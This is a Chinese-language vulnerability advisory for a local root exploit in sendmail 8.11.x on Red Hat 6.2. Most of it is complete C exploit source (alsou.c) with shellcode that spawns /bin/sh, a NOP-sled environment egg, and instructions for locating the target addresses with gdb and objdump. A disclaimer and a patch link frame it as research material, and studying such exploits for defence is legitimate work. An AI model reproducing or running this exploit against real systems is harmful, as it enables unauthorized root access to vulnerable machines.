涉及程序: sendmail
描述: 本地攻击者利用 sendmail 漏洞能取得 root 权限
详细: 发现 sendmail 存在本地漏洞,攻击者利用此漏洞能取得 root 特权。
测试系统: Sendmail 8.11.4 on Red Hat 6.2 and kernel 2.2.18
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
/* * alsou.c * * sendmail-8.11.x linux x86 exploit * * To use this exploit you should know two numbers: VECT and GOT. * Use gdb to find the first: * * $ gdb -q /usr/sbin/sendmail * (gdb) break tTflag * Breakpoint 1 at 0x8080629 * (gdb) r -d1-1.1 * Starting program: /usr/sbin/sendmail -d1-1.1 * * Breakpoint 1, 0x8080629 in tTflag () * (gdb) disassemble tTflag * ............. * 0x80806ea : dec %edi * 0x80806eb : mov %edi,0xfffffff8(%ebp) * 0x80806ee : jmp 0x80806f9 * 0x80806f0 : mov 0x80b21f4,%eax * ^^^^^^^^^^^^^^^^^^ address of VECT * 0x80806f5 : mov %bl,(%esi,%eax,1) * 0x80806f8 : inc %esi * 0x80806f9 : cmp 0xfffffff8(%ebp),%esi * 0x80806fc : jle 0x80806f0 * ............. * (gdb) x/x 0x80b21f4 * 0x80b21f4 : 0x080b9ae0 * ^^^^^^^^^^^^^ VECT * * Use objdump to find the second: * $ objdump -R /usr/sbin/sendmail |grep setuid * 0809e07c R_386_JUMP_SLOT setuid * ^^^^^^^^^ GOT * * Probably you should play with OFFSET to make exploit work. * * Constant values, written in this code found for sendmail-8.11.4 * on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and * GOT = 0x0809e07c. * * To get r00t type ./alsou and then press Ctrl+C. * * * grange * */
#include #include
#define OFFSET 1000 #define VECT 0x080baf20 #define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" "\xc0\x88\x43\x07\x89\x5b\x08\x89" "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0" "\x0b\xcd\x80\xe8\xe6\xff\xff\xff" "/bin/sh";
unsigned int get_esp() { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[]) { char *egg, s[256], tmp[256], *av[3], *ev[2]; unsigned int got = GOT, vect = VECT, ret, first, last, i;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5); if (egg == NULL) { perror("malloc()"); exit(-1); } sprintf(egg, "EGG="); memset(egg + 4, 0x90, NOPNUM); sprintf(egg + 4 + NOPNUM, "%s", shellcode);
ret = get_esp() + OFFSET;
sprintf(s, "-d"); first = -vect - (0xffffffff - got + 1); last = first; while (ret) { i = ret & 0xff; sprintf(tmp, "%u-%u.%u-", first, last, i); strcat(s, tmp); last = ++first; ret = ret >> 8; } s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail"; av[1] = s; av[2] = NULL; ev[0] = egg; ev[1] = NULL; execve(*av, av, ev); }
解决方案: 下载安装升级版本: http://www.sendmail.org/8.12.0.Beta19.html

|